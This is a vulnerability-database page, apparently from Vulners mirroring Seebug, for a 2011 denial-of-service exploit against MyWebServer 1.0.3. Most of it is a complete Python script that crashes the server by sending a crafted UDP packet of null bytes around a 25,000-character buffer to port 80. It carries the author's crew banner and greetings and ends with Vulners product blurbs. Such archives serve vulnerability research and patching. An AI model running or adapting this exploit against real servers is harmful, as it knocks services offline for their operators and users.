Lucene search
K

MyWebServer 1.0.3 - Denial of Service

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 15 Views

MyWebServer 1.0.3 can be crashed using a Denial of Service attack via a crafted packet.

Code

                                                # #########################################################################
#~ Title         : MyWebServer v1.0.3 Denial Of Service  
#~ Software      : http://www.softpedia.com/get/Internet/Servers/WEB-Servers/MyWebServer.shtml
#~ Tested on     : Windows 7 (home premium) / Windows XP SP2 EN
#~ Date          : 27/07/2011
#~ Author        : X-h4ck
#~ Site          : http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/ 
#~ Email         : [email protected] 
#~ Greetz        : Danzel - Wulns~ - IllyrianWarrior- Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon - mywisdom
# #########################################################################
#Attention : It will crash on google chrome!

#!/usr/bin/python
print " MyWebServer v1.0.3 Denial Of Service"
print " PirateAL@ // Aint no pussy made where we came from \\ "
print " "

import socket
 
host = '127.0.0.1' #IP
port = 80 #PORT

buff = "\x41" * 25000
aww = "A"
exp = "\x00\x01" + buff + "\0" + aww + "\0" 
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    print "Connecting..."
    print "w8..."
    sock.sendto(exp, (host, port))
    print sock.recv(1024)
    sock.close()
except:
    print "hmmm, done"

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
15